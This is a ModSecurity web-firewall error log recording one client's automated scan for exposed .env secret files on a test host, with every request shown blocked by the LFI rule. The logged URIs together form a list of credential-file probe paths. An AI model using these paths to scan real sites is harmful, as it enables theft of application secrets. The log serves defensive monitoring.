[Thu Jan 08 21:18:08.530290 2026] [:error] [pid 1270039] [client 18.119.100.98:59762] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/stg/.env.production"] [unique_id "aWARAJccQYhM1DUhi_W7EAAAAAQ"]
[Thu Jan 08 21:18:08.530476 2026] [:error] [pid 1270039] [client 18.119.100.98:59762] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/stg/.env.production"] [unique_id "aWARAJccQYhM1DUhi_W7EAAAAAQ"]
[Thu Jan 08 21:18:08.883335 2026] [:error] [pid 1270043] [client 18.119.100.98:59914] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env.production"] [unique_id "aWARAAvEr1EpOYnVfM6rywAAAAc"]
[Thu Jan 08 21:18:08.883550 2026] [:error] [pid 1270043] [client 18.119.100.98:59914] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env.production"] [unique_id "aWARAAvEr1EpOYnVfM6rywAAAAc"]
[Thu Jan 08 21:18:08.883698 2026] [:error] [pid 1270043] [client 18.119.100.98:59914] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env.production"] [unique_id "aWARAAvEr1EpOYnVfM6rywAAAAc"]
[Thu Jan 08 21:18:09.232033 2026] [:error] [pid 1270035] [client 18.119.100.98:60054] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.docker.dev"] [unique_id "aWARASYqm_i2BUcmtQb4wAAAAAA"]
[Thu Jan 08 21:18:09.232240 2026] [:error] [pid 1270035] [client 18.119.100.98:60054] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.docker.dev"] [unique_id "aWARASYqm_i2BUcmtQb4wAAAAAA"]
[Thu Jan 08 21:18:09.232395 2026] [:error] [pid 1270035] [client 18.119.100.98:60054] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.docker.dev"] [unique_id "aWARASYqm_i2BUcmtQb4wAAAAAA"]
[Thu Jan 08 21:18:09.581058 2026] [:error] [pid 1270041] [client 18.119.100.98:60258] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.staging"] [unique_id "aWARAc3GwEx_BV8-CrWUTAAAAAU"]
[Thu Jan 08 21:18:09.581277 2026] [:error] [pid 1270041] [client 18.119.100.98:60258] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.staging"] [unique_id "aWARAc3GwEx_BV8-CrWUTAAAAAU"]
[Thu Jan 08 21:18:09.581437 2026] [:error] [pid 1270041] [client 18.119.100.98:60258] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.staging"] [unique_id "aWARAc3GwEx_BV8-CrWUTAAAAAU"]
[Thu Jan 08 21:18:09.935501 2026] [:error] [pid 1270042] [client 18.119.100.98:60444] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /product/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/product/.env.production"] [unique_id "aWARAS7RlX2cRjHcFz6xyAAAAAY"]
[Thu Jan 08 21:18:09.935736 2026] [:error] [pid 1270042] [client 18.119.100.98:60444] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/product/.env.production"] [unique_id "aWARAS7RlX2cRjHcFz6xyAAAAAY"]
[Thu Jan 08 21:18:09.935884 2026] [:error] [pid 1270042] [client 18.119.100.98:60444] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/product/.env.production"] [unique_id "aWARAS7RlX2cRjHcFz6xyAAAAAY"]
[Thu Jan 08 21:18:10.287968 2026] [:error] [pid 1283304] [client 18.119.100.98:60638] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shop/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/shop/.env"] [unique_id "aWARAmAwUIZgFNkik8yVQwAAAAg"]
[Thu Jan 08 21:18:10.288185 2026] [:error] [pid 1283304] [client 18.119.100.98:60638] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/shop/.env"] [unique_id "aWARAmAwUIZgFNkik8yVQwAAAAg"]
[Thu Jan 08 21:18:10.288341 2026] [:error] [pid 1283304] [client 18.119.100.98:60638] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/shop/.env"] [unique_id "aWARAmAwUIZgFNkik8yVQwAAAAg"]
[Thu Jan 08 21:18:10.630867 2026] [:error] [pid 1270036] [client 18.119.100.98:60818] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /user/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/user/.env.local"] [unique_id "aWARAuM1154Q6b0hewij7AAAAAE"]
[Thu Jan 08 21:18:10.631068 2026] [:error] [pid 1270036] [client 18.119.100.98:60818] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/user/.env.local"] [unique_id "aWARAuM1154Q6b0hewij7AAAAAE"]
[Thu Jan 08 21:18:10.631240 2026] [:error] [pid 1270036] [client 18.119.100.98:60818] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/user/.env.local"] [unique_id "aWARAuM1154Q6b0hewij7AAAAAE"]
[Thu Jan 08 21:18:10.975399 2026] [:error] [pid 1270037] [client 18.119.100.98:32774] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /old/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env.production"] [unique_id "aWARAuA_IfWyU2EIiRhOjAAAAAI"]
[Thu Jan 08 21:18:10.975628 2026] [:error] [pid 1270037] [client 18.119.100.98:32774] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env.production"] [unique_id "aWARAuA_IfWyU2EIiRhOjAAAAAI"]
[Thu Jan 08 21:18:10.975815 2026] [:error] [pid 1270037] [client 18.119.100.98:32774] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env.production"] [unique_id "aWARAuA_IfWyU2EIiRhOjAAAAAI"]
[Thu Jan 08 21:18:11.323398 2026] [:error] [pid 1280390] [client 18.119.100.98:32960] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /marketing/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/marketing/.env.production"] [unique_id "aWARA9KTJIy7S9W5nL2LRwAAAAk"]
[Thu Jan 08 21:18:11.323609 2026] [:error] [pid 1280390] [client 18.119.100.98:32960] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/marketing/.env.production"] [unique_id "aWARA9KTJIy7S9W5nL2LRwAAAAk"]
[Thu Jan 08 21:18:11.323776 2026] [:error] [pid 1280390] [client 18.119.100.98:32960] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/marketing/.env.production"] [unique_id "aWARA9KTJIy7S9W5nL2LRwAAAAk"]
[Thu Jan 08 21:18:12.042501 2026] [:error] [pid 1270039] [client 18.119.100.98:33348] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /production/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/production/.env.local"] [unique_id "aWARBJccQYhM1DUhi_W7EQAAAAQ"]
[Thu Jan 08 21:18:12.042729 2026] [:error] [pid 1270039] [client 18.119.100.98:33348] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/production/.env.local"] [unique_id "aWARBJccQYhM1DUhi_W7EQAAAAQ"]
[Thu Jan 08 21:18:12.042889 2026] [:error] [pid 1270039] [client 18.119.100.98:33348] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/production/.env.local"] [unique_id "aWARBJccQYhM1DUhi_W7EQAAAAQ"]
[Thu Jan 08 21:18:12.399182 2026] [:error] [pid 1270043] [client 18.119.100.98:33542] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apis/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/apis/.env.production"] [unique_id "aWARBAvEr1EpOYnVfM6rzAAAAAc"]
[Thu Jan 08 21:18:12.399413 2026] [:error] [pid 1270043] [client 18.119.100.98:33542] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/apis/.env.production"] [unique_id "aWARBAvEr1EpOYnVfM6rzAAAAAc"]
[Thu Jan 08 21:18:12.399578 2026] [:error] [pid 1270043] [client 18.119.100.98:33542] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/apis/.env.production"] [unique_id "aWARBAvEr1EpOYnVfM6rzAAAAAc"]
[Thu Jan 08 21:18:12.750799 2026] [:error] [pid 1270035] [client 18.119.100.98:33734] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/staging/.env.local"] [unique_id "aWARBCYqm_i2BUcmtQb4wQAAAAA"]
[Thu Jan 08 21:18:12.751010 2026] [:error] [pid 1270035] [client 18.119.100.98:33734] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/staging/.env.local"] [unique_id "aWARBCYqm_i2BUcmtQb4wQAAAAA"]
[Thu Jan 08 21:18:12.751180 2026] [:error] [pid 1270035] [client 18.119.100.98:33734] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/staging/.env.local"] [unique_id "aWARBCYqm_i2BUcmtQb4wQAAAAA"]
[Thu Jan 08 21:18:13.099896 2026] [:error] [pid 1270041] [client 18.119.100.98:33934] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env.local"] [unique_id "aWARBc3GwEx_BV8-CrWUTQAAAAU"]
[Thu Jan 08 21:18:13.100167 2026] [:error] [pid 1270041] [client 18.119.100.98:33934] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env.local"] [unique_id "aWARBc3GwEx_BV8-CrWUTQAAAAU"]
[Thu Jan 08 21:18:13.100879 2026] [:error] [pid 1270041] [client 18.119.100.98:33934] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env.local"] [unique_id "aWARBc3GwEx_BV8-CrWUTQAAAAU"]
[Thu Jan 08 21:18:13.447716 2026] [:error] [pid 1270042] [client 18.119.100.98:34108] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/core/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env.local"] [unique_id "aWARBS7RlX2cRjHcFz6xyQAAAAY"]
[Thu Jan 08 21:18:13.447929 2026] [:error] [pid 1270042] [client 18.119.100.98:34108] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env.local"] [unique_id "aWARBS7RlX2cRjHcFz6xyQAAAAY"]
